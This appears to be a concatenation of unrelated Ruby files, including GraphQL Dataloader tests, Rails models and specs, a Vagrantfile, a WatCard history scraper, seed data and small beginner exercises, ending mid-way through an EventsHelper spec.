assert_equal expected_log, database_log
end
it "uses cached values from .merge" do
query_str = "{ ingredient(id: 1) { id name } }"
assert_equal "Wheat", schema.execute(query_str)["data"]["ingredient"]["name"]
assert_equal [[:mget, ["1"]]], database_log
database_log.clear
dataloader = schema.dataloader_class.new
data_source = dataloader.with(FiberSchema::DataObject)
data_source.merge({ "1" => { name: "Kamut", id: "1", type: "Grain" } })
assert_equal "Kamut", data_source.load("1")[:name]
res = schema.execute(query_str, context: { dataloader: dataloader })
assert_equal [], database_log
assert_equal "Kamut", res["data"]["ingredient"]["name"]
end
end
end
end
let(:schema) { FiberSchema }
include DataloaderAssertions
if Fiber.respond_to?(:scheduler)
describe "nonblocking: true" do
let(:schema) { Class.new(FiberSchema) do
use GraphQL::Dataloader, nonblocking: true
end }
before do
Fiber.set_scheduler(::DummyScheduler.new)
end
after do
Fiber.set_scheduler(nil)
end
include DataloaderAssertions
end
if RUBY_ENGINE == "ruby" && !ENV["GITHUB_ACTIONS"]
describe "nonblocking: true with libev" do
require "libev_scheduler"
let(:schema) { Class.new(FiberSchema) do
use GraphQL::Dataloader, nonblocking: true
end }
before do
Fiber.set_scheduler(Libev::Scheduler.new)
end
after do
Fiber.set_scheduler(nil)
end
include DataloaderAssertions
end
end
end
describe "example from #3314" do
module Example
class FooType < GraphQL::Schema::Object
field :id, ID, null: false
end
class FooSource < GraphQL::Dataloader::Source
def fetch(ids)
ids.map { |id| OpenStruct.new(id: id) }
end
end
class QueryType < GraphQL::Schema::Object
field :foo, Example::FooType do
argument :foo_id, GraphQL::Types::ID, required: false, loads: Example::FooType
argument :use_load, GraphQL::Types::Boolean, required: false, default_value: false
end
def foo(use_load: false, foo: nil)
if use_load
dataloader.with(Example::FooSource).load("load")
else
dataloader.with(Example::FooSource).request("request")
end
end
end
class Schema < GraphQL::Schema
query Example::QueryType
use GraphQL::Dataloader
def self.object_from_id(id, ctx)
ctx.dataloader.with(Example::FooSource).request(id)
end
end
end
it "loads properly" do
result = Example::Schema.execute(<<-GRAPHQL)
{
foo(useLoad: false, fooId: "Other") {
__typename
id
}
fooWithLoad: foo(useLoad: true, fooId: "Other") {
__typename
id
}
}
GRAPHQL
# This should not have a Lazy in it
expected_result = {
"data" => {
"foo" => { "id" => "request", "__typename" => "Foo" },
"fooWithLoad" => { "id" => "load", "__typename" => "Foo" },
}
}
assert_equal expected_result, result.to_h
end
end
class FiberErrorSchema < GraphQL::Schema
class ErrorObject < GraphQL::Dataloader::Source
def fetch(_)
raise ArgumentError, "Nope"
end
end
class Query < GraphQL::Schema::Object
field :load, String, null: false
field :load_all, String, null: false
field :request, String, null: false
field :request_all, String, null: false
def load
dataloader.with(ErrorObject).load(123)
end
def load_all
dataloader.with(ErrorObject).load_all([123])
end
def request
req = dataloader.with(ErrorObject).request(123)
req.load
end
def request_all
req = dataloader.with(ErrorObject).request_all([123])
req.load
end
end
use GraphQL::Dataloader
query(Query)
rescue_from(StandardError) do |err, obj, args, ctx, field|
ctx[:errors] << "#{err.message} (#{field.owner.name}.#{field.graphql_name}, #{obj.inspect}, #{args.inspect})"
nil
end
end
it "Works with error handlers" do
context = { errors: [] }
res = FiberErrorSchema.execute("{ load loadAll request requestAll }", context: context)
expected_errors = [
"Nope (FiberErrorSchema::Query.load, nil, {})",
"Nope (FiberErrorSchema::Query.loadAll, nil, {})",
"Nope (FiberErrorSchema::Query.request, nil, {})",
"Nope (FiberErrorSchema::Query.requestAll, nil, {})",
]
assert_equal(nil, res["data"])
assert_equal(expected_errors, context[:errors].sort)
end
it "has proper context[:current_field]" do
res = FiberSchema.execute("mutation { mutation1(argument1: \"abc\") { __typename } mutation2(argument2: \"def\") { __typename } }")
assert_equal({"mutation1"=>nil, "mutation2"=>nil}, res["data"])
expected_errors = [
"FieldTestError @ [\"mutation1\"], Mutation.mutation1 / Mutation.mutation1",
"FieldTestError @ [\"mutation2\"], Mutation.mutation2 / Mutation.mutation2",
]
assert_equal expected_errors, res.context[:errors]
end
it "passes along throws" do
value = catch(:hello) do
dataloader = GraphQL::Dataloader.new
dataloader.append_job do
throw(:hello, :world)
end
dataloader.run
end
assert :world, value
end
class CanaryDataloader < GraphQL::Dataloader::NullDataloader
end
it "uses context[:dataloader] when given" do
res = Class.new(GraphQL::Schema) do
query_type = Class.new(GraphQL::Schema::Object) do
graphql_name "Query"
end
query(query_type)
end.execute("{ __typename }")
assert_instance_of GraphQL::Dataloader::NullDataloader, res.context.dataloader
res = FiberSchema.execute("{ __typename }")
assert_instance_of GraphQL::Dataloader, res.context.dataloader
refute res.context.dataloader.nonblocking?
res = FiberSchema.execute("{ __typename }", context: { dataloader: CanaryDataloader.new } )
assert_instance_of CanaryDataloader, res.context.dataloader
if Fiber.respond_to?(:scheduler)
Fiber.set_scheduler(::DummyScheduler.new)
res = FiberSchema.execute("{ __typename }", context: { dataloader: GraphQL::Dataloader.new(nonblocking: true) })
assert res.context.dataloader.nonblocking?
res = FiberSchema.multiplex([{ query: "{ __typename }" }], context: { dataloader: GraphQL::Dataloader.new(nonblocking: true) })
assert res[0].context.dataloader.nonblocking?
Fiber.set_scheduler(nil)
end
end
describe "#run_isolated" do
module RunIsolated
class CountSource < GraphQL::Dataloader::Source
def fetch(ids)
@count ||= 0
@count += ids.size
ids.map { |_id| @count }
end
end
end
it "uses its own queue" do
dl = GraphQL::Dataloader.new
result = {}
dl.append_job { result[:a] = 1 }
dl.append_job { result[:b] = 2 }
dl.append_job { result[:c] = 3 }
dl.run_isolated { result[:d] = 4 }
assert_equal({ d: 4 }, result)
dl.run_isolated {
_r1 = dl.with(RunIsolated::CountSource).request(1)
_r2 = dl.with(RunIsolated::CountSource).request(2)
r3 = dl.with(RunIsolated::CountSource).request(3)
# This is going to `Fiber.yield`
result[:e] = r3.load
}
assert_equal({ d: 4, e: 3 }, result)
dl.run
assert_equal({ a: 1, b: 2, c: 3, d: 4, e: 3 }, result)
end
it "shares a cache" do
dl = GraphQL::Dataloader.new
result = {}
dl.run_isolated {
_r1 = dl.with(RunIsolated::CountSource).request(1)
_r2 = dl.with(RunIsolated::CountSource).request(2)
r3 = dl.with(RunIsolated::CountSource).request(3)
# Run all three of the above requests:
result[:a] = r3.load
}
dl.append_job {
# This should return cached from above
result[:b] = dl.with(RunIsolated::CountSource).load(1)
}
dl.append_job {
# This one is run by itself
result[:c] = dl.with(RunIsolated::CountSource).load(4)
}
assert_equal({ a: 3 }, result)
dl.run
assert_equal({ a: 3, b: 3, c: 4 }, result)
end
end
describe "thread local variables" do
module ThreadVariable
class Type < GraphQL::Schema::Object
field :key, String, null: false
field :value, String, null: false
end
class Source < GraphQL::Dataloader::Source
def fetch(keys)
keys.map { |key| OpenStruct.new(key: key, value: Thread.current[key.to_sym]) }
end
end
class QueryType < GraphQL::Schema::Object
field :thread_var, ThreadVariable::Type do
argument :key, GraphQL::Types::String
end
def thread_var(key:)
dataloader.with(ThreadVariable::Source).load(key)
end
end
class Schema < GraphQL::Schema
query ThreadVariable::QueryType
use GraphQL::Dataloader
end
end
it "sets the parent thread locals in the execution fiber" do
Thread.current[:test_thread_var] = 'foobarbaz'
result = ThreadVariable::Schema.execute(<<-GRAPHQL)
{
threadVar(key: "test_thread_var") {
key
value
}
}
GRAPHQL
expected_result = {
"data" => {
"threadVar" => { "key" => "test_thread_var", "value" => "foobarbaz" }
}
}
assert_equal expected_result, result.to_h
end
end
describe "dataloader calls from inside sources" do
class NestedDataloaderCallsSchema < GraphQL::Schema
class Echo < GraphQL::Dataloader::Source
def fetch(keys)
keys
end
end
class Nested < GraphQL::Dataloader::Source
def fetch(keys)
dataloader.with(Echo).load_all(keys)
end
end
class Nested2 < GraphQL::Dataloader::Source
def fetch(keys)
dataloader.with(Nested).load_all(keys)
end
end
class QueryType < GraphQL::Schema::Object
field :nested, String
field :nested2, String
def nested
dataloader.with(Nested).load("nested")
end
def nested2
dataloader.with(Nested2).load("nested2")
end
end
query QueryType
use GraphQL::Dataloader
end
end
it "loads data from inside source methods" do
assert_equal({ "data" => { "nested" => "nested" } }, NestedDataloaderCallsSchema.execute("{ nested }"))
assert_equal({ "data" => { "nested2" => "nested2" } }, NestedDataloaderCallsSchema.execute("{ nested2 }"))
assert_equal({ "data" => { "nested" => "nested", "nested2" => "nested2" } }, NestedDataloaderCallsSchema.execute("{ nested nested2 }"))
end
describe "with lazy authorization hooks" do
class LazyAuthHookSchema < GraphQL::Schema
class Source < ::GraphQL::Dataloader::Source
def fetch(ids)
return ids.map {|i| i * 2}
end
end
class BarType < GraphQL::Schema::Object
field :id, Integer
def id
object
end
def self.authorized?(object, context)
-> { true }
end
end
class FooType < GraphQL::Schema::Object
field :dataloader_value, BarType
def self.authorized?(object, context)
-> { true }
end
def dataloader_value
dataloader.with(Source).load(1)
end
end
class QueryType < GraphQL::Schema::Object
field :foo, FooType
def foo
{}
end
end
use GraphQL::Dataloader
query QueryType
lazy_resolve Proc, :call
end
it "resolves everything" do
dataloader_query = """
query {
foo {
dataloaderValue {
id
}
}
}
"""
dataloader_result = LazyAuthHookSchema.execute(dataloader_query)
assert_equal 2, dataloader_result["data"]["foo"]["dataloaderValue"]["id"]
end
end
end
|
class Micropost < ApplicationRecord
belongs_to :user
validates :content, length:{maximum: 140}, presence: true # limit the content length to 140 chars, and the presence: true means that the posts shouldn't be empty
end
|
class History < ActiveRecord::Base
belongs_to :user
has_many :cloths, through: :cloths_histories
has_many :cloths_histories
accepts_nested_attributes_for :cloths_histories
end
|
#Esta clase representa una tabla, donde cada renglon contiene columnas con valores asociados a dicho
#renglón y columna
class Reporte
EXTENDIDO = 101
REDUCIDO = 010
attr_reader :titulo
attr_reader :total
attr_reader :estilo
def self.datos_a=(datos)
@datos_a = datos
end
def self.datos_a
return @datos_a
end
def busca_estado(estado)
for renglon in @renglones_reporte
if renglon.estado.eql? estado
return renglon
end
end
end
#Inicializa el arreglo que almacenará instancias de la clase RenglonReporte
def initialize(nombre, estilo)
@titulo = nombre
@estilo = estilo
@renglones_reporte = Array.new
@numero = 0
@total = nil
end
#Agrega un objeto de tipo RenglonReporte al conjunto de renglones
def agrega_renglon(renglon)
if renglon.instance_of? RenglonReporte
@renglones_reporte << renglon
else
raise ArgumentError.new("El objeto no es del tipo esperado : RenglonReporte")
end
end
#Genera un renglon que esta identificado por la llave 'Total' y que corresponde a el total y promedio
#total de cada columna para todos los estados
def genera_renglon_total
total = Hash.new
@renglones_reporte.each do |renglon|
renglon.columnas.keys.each do |columna|
if total[columna].nil?
total[columna] = {:total => renglon.columnas[columna][:total], :promedio => 0}
else
total[columna][:total] += renglon.columnas[columna][:total]
end
end
end
total_t = total["Total"][:total]
total["Total"][:promedio] = 100
total.keys.each do |key|
begin
total[key][:promedio] = (total[key][:total]/total_t.to_f*100).round
rescue
total[key][:promedio] = 0
end
end
@total = total
end
#Devuelve el conjunto de renglones
def renglones
@renglones_reporte
end
#Datos de grafica recibe los datos totales por columna
def renglon_a_grafica
genera_renglon_total
devuelto = Hash.new
@renglones_reporte[0].id_columnas.each do |key|
devuelto[key] = @total[key][:promedio]
end
devuelto
end
#Devuelve la lista de estados de este reporte
def estados
devuelto = Array.new
@renglones_reporte.each do |renglon|
devuelto << renglon.estado
end
devuelto
end
#Devuelve la lista de identificadores de columnas
def columnas
@renglones_reporte[0].id_columnas
end
def numero=(num)
@numero = num
end
def numero
@numero
end
end
|
# coding: utf-8
lib = File.expand_path('../lib', __FILE__)
$LOAD_PATH.unshift(lib) unless $LOAD_PATH.include?(lib)
require 'jekyll-pypedown/version'
Gem::Specification.new do |spec|
spec.name = "jekyll-pypedown"
spec.version = Jekyll::Pypedown::VERSION
spec.summary = "Pygments + Typogruby + kramdown for Jekyll"
spec.description = "A Jekyll plugin that enables Pygments syntax highlighting for kramdown-parsed fenced code blocks."
spec.authors = ["Paul Robert Lloyd"]
spec.email = "me+rubygems@paulrobertlloyd.com"
spec.files = Dir.glob("lib/**/*.rb")
spec.homepage = "https://github.com/paulrobertlloyd/jekyll-pypedown"
spec.license = "MIT"
spec.add_dependency "jekyll", "~> 2.4"
spec.add_dependency "pygments.rb", "~> 0.6"
spec.add_dependency "typogruby", "~> 1.0"
spec.add_dependency "kramdown", "~> 1.4"
end
|
require "base_parser"
require "single_crochet"
require "double_crochet"
require "slip_stitch"
require "stitch_factory"
module Parsers
# Basic Stitch Parser
class BasicStitchParser < Parsers::BaseParser
def initialize(instructions)
@instructions = instructions.downcase.strip
@stitch_factory = StitchFactory.new
end
def parse
return unless self.class.parsable?(@instructions)
stitch_to_parse = @instructions[self.class.basic_stitch_regex]
basic_stitch = @stitch_factory.get_stitch(stitch_to_parse)
repeat_times = @instructions[self.class.digit_regex].to_i
if repeat_times > 1
RepeatInstruction.new(repeat_times, [*basic_stitch])
else
basic_stitch
end
end
def self.parsable?(inst)
!inst.downcase.strip[basic_stitch_regex].nil?
end
private
def self.basic_stitch_abbrevs
@basic_stitches ||= Stitches::BASIC.map do |stitch|
Module.const_get(stitch).abbrev
end
end
def self.basic_stitch_regex
/#{basic_stitch_abbrevs.join("|")}/
end
end
end
|
module Hotel
class Reservation
attr_reader :room, :check_in, :check_out
def initialize(room, check_in, check_out)
check_date_range(check_in, check_out)
@room = room
@check_in = check_in
@check_out = check_out
end
def check_date_range(check_in, check_out)
if check_out <= check_in
raise StandardError, "Invalid date range provided"
end
end
def reservation_cost
days_reserved = check_out - check_in
return days_reserved.to_i * room.cost
end
end
end
|
puts <<~TEXT
旅行プランを選択して下さい。
1. 沖縄旅行(10000円)
2. 北海道旅行(20000円)
3. 九州旅行(15000円)
TEXT
while true
print "プランの番号を選択 > "
plan_num = gets.to_i
break if (1..3).include?(plan_num)
puts "1以上を入力して下さい。"
end
case plan_num
when 1
place = "沖縄旅行"
price = 10000
when 2
place = "北海道旅行"
price = 20000
when 3
place = "九州旅行"
price = 15000
end
puts "#{place}ですね。"
puts "何名で予約されますか?"
while true
print "人数を入力 > "
join_member_num = gets.to_i
break if join_member_num >= 1
puts "1以上を入力して下さい。"
end
puts "#{join_member_num}名ですね。"
total_price = join_member_num * price
if join_member_num >= 5
puts "5人以上なので10%割引になります。"
total_price *= 0.9
end
puts "合計料金は#{total_price.floor}円になります。" |
class Person < ApplicationRecord
# Assoc
# Validations
validates :age, numericality: {
less_than_or_equal_to: 150
}
validates :name, :age, :alive, :gender, presence: true
# Methods
# class method
def self.order_by_age
order(:age)
end
# instance method
#callback
before_save :set_alive
def set_alive
self.alive = true
end
end
|
#--
# Copyright (c) 2009-2010, John Mettraux, jmettraux@gmail.com
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
#
# Made in Japan.
#++
module Rufus
module Tokyo
#
# A mixin for Cabinet and Map, gathers all the hash-like methods
#
module HashMethods
include Enumerable
attr_accessor :default_proc
# The [] methods
#
# (assumes there's an underlying get(k) method)
#
def [] (k)
val = get(k)
return val unless val.nil?
return nil unless @default_proc
@default_proc.call(self, k)
end
# Returns an array of all the values
#
def values
collect { |k, v| v }
end
# Our classical 'each'
#
def each
#
# drop to Edo's C API calls to avoid two-step iteration
# (keys() then each())
#
if defined?(@db) and %w[iterinit iternext].all? { |m| @db.respond_to?(m) }
@db.iterinit
while k = @db.iternext
yield(k, self[k])
end
#
# drop to Tokyo's FFI calls to avoid two-step iteration
# (keys() then each())
#
elsif self.class.name != "Rufus::Tokyo::Table" and # use String for Edo
defined?(@db) and
respond_to?(:lib) and
%w[abs_iterinit abs_iternext].all? { |m| lib.respond_to?(m) }
begin
lib.abs_iterinit(@db)
int = FFI::MemoryPointer.new(:int)
loop do
key_pointer = lib.abs_iternext(@db, int)
break if key_pointer.address.zero?
k = key_pointer.get_bytes(0, int.get_int(0))
yield(k, self[k])
end
ensure
int.free if int
end
# we couldn't do it fast, so go ahead with slow-but-accurate
else
keys.each { |k| yield(k, self[k]) }
end
end
# Turns this instance into a Ruby hash
#
def to_h
self.inject({}) { |h, (k, v)| h[k] = v; h }
end
# Turns this instance into an array of [ key, value ]
#
def to_a
#self.collect { |e| e }
# not OK with ruby 1.9.1
self.inject([]) { |a, (k, v)| a << [ k, v ]; a }
end
# Returns a new Ruby hash which is a merge of this Map and the given hash
#
def merge (h)
self.to_h.merge(h)
end
# Merges the entries in the given hash into this map
#
def merge! (h)
h.each { |k, v| self[k] = v }
self
end
# Returns the default value, the value that would be returned by h[k] if
# k did not exist among h keys.
#
def default (key=nil)
return nil unless @default_proc
@default_proc.call(self, key) rescue nil
end
# Sets the default value for the Hash.
#
# Warning : use #default_proc= if you want to change the default_proc
# directly.
#
def default= (val)
@default_proc = val.nil? ? nil : lambda { |h, k| val }
end
end
end
end
|
class UserMailer < ApplicationMailer
default from: 'DONOTREPLY@ucsdmun.org'
def welcome_email(user, url)
@user = user
@url = url+"#{user.email}"
# @url = 'http://example.com/login'
mail(to: @user.email, subject: 'Welcome to Model United Nations at UCSD')
end
def change_password_mail(user)
@user = user
mail(to: @user.email, subject: 'Your Password changed.')
end
def new_contact_mail(user, contact)
@contact = contact
mail(to: user.email, subject: 'New Contact')
end
end
|
require 'spec_helper'
describe RabbitJobs::Consumer::JobConsumer do
let(:consumer) { RabbitJobs::Consumer::JobConsumer.new }
let(:job) { TestJob.new }
describe '#process_message' do
it 'parses job' do
payload = RJ::Job.serialize(TestJob)
mock(RJ::Job).parse(payload) { job }
consumer.process_message(:delivery_info, :properties, payload)
end
it 'reports parsing errors' do
payload = 'some bad json data'
mock(consumer).report_error(:parsing_error, payload)
consumer.process_message(:delivery_info, :properties, payload).should == true
end
it 'skips expired jobs' do
payload = RJ::Job.serialize(TestJob)
job
mock(TestJob).new { job }
mock(job).expired? { true }
dont_allow(job).run_perform
consumer.process_message(:delivery_info, :properties, payload)
end
it 'executes job.perform' do
payload = RJ::Job.serialize(TestJob)
job
mock(TestJob).new { job }
mock(job).run_perform
consumer.process_message(:delivery_info, :properties, payload)
end
end
describe '#report_error' do
it 'accepts error type :not_found' do
-> { consumer.report_error(:not_found, 'klass_name') }.should_not raise_error
end
it 'accepts error type :parsing_error' do
-> { consumer.report_error(:parsing_error, 'payload data') }.should_not raise_error
end
it 'accepts error type :error' do
exception = nil
begin
fail 'testing'
rescue RuntimeError => e
exception = e
end
-> { consumer.report_error(:error, exception, 'payload data') }.should_not raise_error
end
end
end
|
# -*- mode: ruby -*-
# vi: set ft=ruby :
# All Vagrant configuration is done below. The "2" in Vagrant.configure
# configures the configuration version (we support older styles for
# backwards compatibility). Please don't change it unless you know what
# you're doing.
Vagrant.configure(2) do |config|
# The most common configuration options are documented and commented below.
# For a complete reference, please see the online documentation at
# https://docs.vagrantup.com.
# Every Vagrant development environment requires a box. You can search for
# boxes at https://atlas.hashicorp.com/search.
#config.vm.box = "opscode_ubuntu_trusty_vmware"
config.vm.box = "precise64_vmware"
config.vm.box_url = "http://files.vagrantup.com/precise64_vmware.box"
#config.vm.box = "opscode_precise64_vbox"
#config.vm.box_url = "http://opscode-vm-bento.s3.amazonaws.com/vagrant/virtualbox/opscode_ubuntu-14.04_chef-provisionerless.box"
config.vm.provider "vmware_fusion" do |v|
v.vmx["memsize"] = "2048"
v.vmx["numvcpus"] = "2"
end
#config.vm.provider "virtualbox" do |vb|
# # Display the VirtualBox GUI when booting the machine
# vb.gui = true
#
# # Customize the amount of memory on the VM:
# vb.memory = "2048"
# vb.cpus = "2"
# end
config.vm.define "spark_master", primary: true do |spark|
spark.vm.network "private_network", ip: "192.168.101.211"
end
config.vm.define "spark_node" do |spark|
spark.vm.network "private_network", ip: "192.168.101.212"
end
#
config.vm.provision "chef_solo" do |chef|
require 'yaml'
config = YAML.load_file "secrets.yaml"
user = config.fetch("user")
pass = config.fetch("pass")
chef.json = { "dse" =>
{
"repo_user" => user ,
"repo_pass" => pass
}
}
chef.add_recipe "dse"
end
end
|
require "nokogiri"
require "net/http"
require "uri"
require "time"
require "facets"
require "yaml"
module Watcard
class History
def initialize(config)
@conf = config
end
def log(msg)
STDERR.puts msg
end
def history_page(date)
uri = URI.parse("https://account.watcard.uwaterloo.ca/watgopher661.asp")
date_txt = date.strftime("%m/%d/%Y")
args = {
"acnt_1"=>@conf['id'],
"acnt_2"=>@conf['pin'],
"DBDATE"=>date_txt,
"DEDATE"=>date_txt,
"PASS"=>"PASS",
"STATUS"=>"HIST",
"watgopher_title"=>"WatCard History Report",
"watgopher_regex"=>'<hr>([\s\S]*wrong[\s\S]*)<p></p>|(<form[\s\S]*?(</center>|</form>))|(<pre><p>[\s\S]*</pre>)',
"watgopher_style"=>'onecard_narrow',
}
log "# Fetching history for #{date}"
Net::HTTP.post_form(uri, args)
end
def parse_loc(loc)
return "V1 Cafeteria" if loc =~ /WAT-FS-V1/
return "Liquid Assets" if loc =~ /WAT-FS-LA/
return "V1 Laundry" if loc =~ /V1 LAUNDRY/
return "V1 Front Desk" if loc =~ /V1DESK/
return "Media.Doc" if loc =~ /MEDIA.DOC/
return "Student Health Pharmacy" if loc =~ /STUDENT HEALTH/
loc.strip
end
def history(date)
page_body = history_page(date).body
doc = Nokogiri::HTML(page_body)
table = doc.css('#oneweb_financial_history_table')
table.xpath('.//tr').map do |row|
cols = row.xpath('./td').map(&:inner_text)
next if cols.length < 4
mult = (cols[3] == "1") ? 2 : 1
{
time: Time.parse(cols[1], date),
amount: -(cols[2].strip.to_f)*mult,
loc: parse_loc(cols.last),
raw_loc: cols.last,
balance: cols[3].to_i
}
end.compact.reverse
end
def add_transaction_types(hist)
hist.each do |a|
h = a[:time].hour
type = if a[:loc] =~ /laundry/i
"Laundry"
elsif a[:loc] =~ /media|desk/i
"Printing"
elsif a[:loc] =~ /pharmacy/i
"Health Supplies"
elsif h < 11
"Breakfast"
elsif h < 17
"Lunch"
else
"Dinner"
end
a[:meal] = type
end
end
def bundle_transactions(hist)
return hist if hist.empty?
meals = [hist.shift]
hist.each do |a|
# if last meal is same type treat them as one
if a[:meal] == meals.last[:meal]
meals.last[:amount] += a[:amount]
else
meals << a
end
end
meals
end
def add_accounts(hist)
accounts = @conf['accounts']
hist.each do |a|
a[:account] = accounts[a[:balance]] || accounts[4]
end
end
def fetch_meals(days_ago)
hist = history(Time.now.less(days_ago, :days))
return hist if hist.empty?
add_transaction_types(hist)
bundle_transactions(hist)
end
def ledger_transaction(m)
date_str = m[:time].strftime("%Y/%m/%d")
transact = <<END
#{date_str} #{m[:meal]} at #{m[:loc]}
#{m[:account][0]} $#{sprintf('%.2f', m[:amount])}
#{m[:account][1]}
END
end
def ledger_append_prompt(out)
puts out
if STDIN.tty? && @conf['ledger']
print "# Add to file [yN]: "
ans = gets.chomp
exit if ans != "y"
file = File.expand_path(@conf['ledger'])
File.open(file, 'a') {|f| f.puts out}
puts "# Added to #{file}"
end
end
def ledger_transactions(days_ago)
meals = fetch_meals(days_ago)
add_accounts(meals)
meals.map {|m| ledger_transaction(m)}.join('')
end
def output_ledger(days_ago)
log "# Transactions for #{days_ago} days ago"
out = ledger_transactions(days_ago)
ledger_append_prompt(out)
end
def output_ledger_all
start = (Date.today - last_ledger_add).to_i - 1
puts "# Fetching transactions since #{start} days ago"
days = []
start.downto(0).each do |days_ago|
days << ledger_transactions(days_ago)
end
out = days.join('')
log "# Transactions since #{start} days ago:"
ledger_append_prompt(out)
end
def output_history(days_ago)
meals = fetch_meals(days_ago)
puts "No Transactions" if meals.empty?
total = 0
meals.each do |m|
total += m[:amount] if m[:balance] == 1
puts "#{m[:meal]}: $#{sprintf('%.2f', m[:amount])} @ #{m[:loc]}"
end
budget = @conf['budget']
print "= $#{total}"
print " out of $#{budget} surplus: #{sprintf('%.2f',budget-total)}" if budget
puts ''
end
def output_raw_history(days_ago)
hist = history(Time.now.less(days_ago, :days))
add_transaction_types(hist)
puts YAML.dump(hist)
end
def last_ledger_add
return Date.today unless @conf['ledger']
file = File.expand_path(@conf['ledger'])
ledger = IO.read(file)
Date.parse(ledger.scan(/\d+\/\d+\/\d+/).last)
end
end
end
|
# This file should contain all the record creation needed to seed the database with its default values.
# The data can then be loaded with the rails db:seed command (or created alongside the database with db:setup).
#
# Examples:
#
# movies = Movie.create([{ name: 'Star Wars' }, { name: 'Lord of the Rings' }])
# Character.create(name: 'Luke', movie: movies.first)
Mechanic.create(name: 'Meg Stang', years_of_experience: 5)
Mechanic.create(name: 'Corey Westerfield', years_of_experience: 2)
Mechanic.create(name: 'Mike Dao', years_of_experience: 4)
amusement_park1 = AmusementPark.create(name: 'Six Flags', admission_price: 50)
amusement_park2 = AmusementPark.create(name: 'Lakeside', admission_price: 10)
amusement_park3 = AmusementPark.create(name: 'DisneyLand', admission_price: 100)
amusement_park1.rides.create(name:'Mr. Twister', thrill_rating: 8)
amusement_park1.rides.create(name:'Sidebender', thrill_rating: 10)
amusement_park1.rides.create(name:'Tower of Doom', thrill_rating: 7)
amusement_park1.rides.create(name:'Cups', thrill_rating: 2)
amusement_park2.rides.create(name:'The Hulk', thrill_rating: 6)
amusement_park2.rides.create(name:'SpiderMan', thrill_rating: 8)
amusement_park2.rides.create(name:'Batman', thrill_rating: 3)
amusement_park2.rides.create(name:'Superman', thrill_rating: 4)
amusement_park3.rides.create(name:'Soaring of California', thrill_rating: 3)
amusement_park3.rides.create(name:'Winnie the Pooh', thrill_rating: 2)
amusement_park3.rides.create(name:'Its a Small World Afterall', thrill_rating: 1)
amusement_park3.rides.create(name:'Peter Pan', thrill_rating: 4)
|
# Multiply Lists
# Write a method that takes two Array arguments in which each Array contains a list of numbers, and returns a new Array that contains the product of each pair of numbers from the arguments that have the same index. You may assume that the arguments contain the same number of elements.
def multiply_list(arr,arr_two)
i = 0
new_arr = []
arr.each_with_index do |x, i|
product = x * arr_two[i]
i += 1
new_arr << product
end
new_arr
end
p multiply_list([3, 5, 7], [9, 10, 11]) == [27, 50, 77]
|
require './input_functions'
module Genre
POP, CLASSIC, JAZZ, ROCK = *1..4
end
$genre_names = ['Null', 'Pop', 'Classic', 'Jazz', 'Rock']
class Track
attr_accessor :name, :location
def initialize (name, location)
@name = name
@location = location
end
end
class Album
attr_accessor :title, :artist, :genre, :tracks
def initialize (title, artist, genre, tracks)
@title = title
@artist = artist
@genre = genre
@tracks = tracks
end
end
# Reads in and returns a single track from the terminal
def read_track index
track_name = read_string('Please enter track No.' + (index + 1).to_s + ' name.')
track_file_location = read_string('Please enter track No.' + (index + 1).to_s + ' file location.')
track = Track.new(track_name, track_file_location)
track
end
# Reads in and returns an array of multiple tracks from the given file
def read_tracks
tracks = Array.new()
count = read_integer_in_range("Enter track count: ", 0, 15)
i = 0
while i < count
track = read_track(i)
tracks << track
i += 1
end
tracks
end
# Display the genre names in a
# numbered list and ask the user to select one
def read_genre()
count = $genre_names.length
i = 0
puts 'Genre: '
while i < count
puts "#{i} " + $genre_names[i]
i += 1
end
selectedGenre = read_integer_in_range('Please select your album genre.', 0, count - 1)
selectedGenre
end
# Reads in and returns a single album from the terminal, with all its tracks
def read_album
album_title = read_string("Please enter album title.")
album_artist = read_string("Please enter album artist.")
album_genre = $genre_names[read_genre].to_s
tracks = read_tracks
album = Album.new(album_title, album_artist, album_genre, tracks)
album
end
# Takes an array of tracks and prints them to the terminal
def print_tracks tracks
puts 'Tracks: '
for i in 0...tracks.length do
track = tracks[i]
puts '*********************************************'
puts '**************** Track No. ' + (i + 1).to_s + ' ****************'
puts 'Track name: ' + track.name
puts 'Track file location: ' + track.location
i += 1
end
end
# Takes a single album and prints it to the terminal
def print_album album
puts '*********************************************'
puts 'Album Title: ' + album.title
puts 'Album Artist: ' + album.artist
puts 'Genre: ' + album.genre
puts ''
print_tracks(album.tracks)
end
# Reads in an array of albums from a file and then prints all the albums in the
# array to the terminal
def main
puts "Welcome to the music player"
album = read_album()
print_album(album)
end
main
|
# frozen_string_literal: true
require 'rails_helper'
RSpec.describe EventsHelper do
let(:user) { create(:user) }
let(:event) { create(:event) }
describe 'override_icon' do
let(:reg) { create(:registration, user: user, event: event) }
before { generic_seo_and_ao }
it 'generates the correct normal icon' do
expect(reg_override_icon(reg)).to eql(
"<a href=\"/override_cost/#{reg.payment.token}\"><i class='fad green fa-file-invoice-dollar fa-1x' " \
"style='' data-fa-transform='' title='Set override cost'></i></a>"
)
end
it 'generates the correct set icon' do
reg.update(override_cost: 1)
expect(reg_override_icon(reg)).to eql(
"<a href=\"/override_cost/#{reg.payment.token}\"><i class='fas green fa-file-invoice-dollar fa-1x' " \
"style='' data-fa-transform='' title='Update override cost'></i></a>"
)
end
it 'generates the correct normal paid icon' do
reg.payment.paid!('1234567890')
expect(reg_override_icon(reg)).to eql(
"<i class='fad gray fa-file-invoice-dollar fa-1x' style='' data-fa-transform='' " \
"title='Registration has already been paid'></i>"
)
end
it 'generates the correct set paid icon' do
reg.update(override_cost: 1)
reg.payment.paid!('1234567890')
expect(reg_override_icon(reg)).to eql(
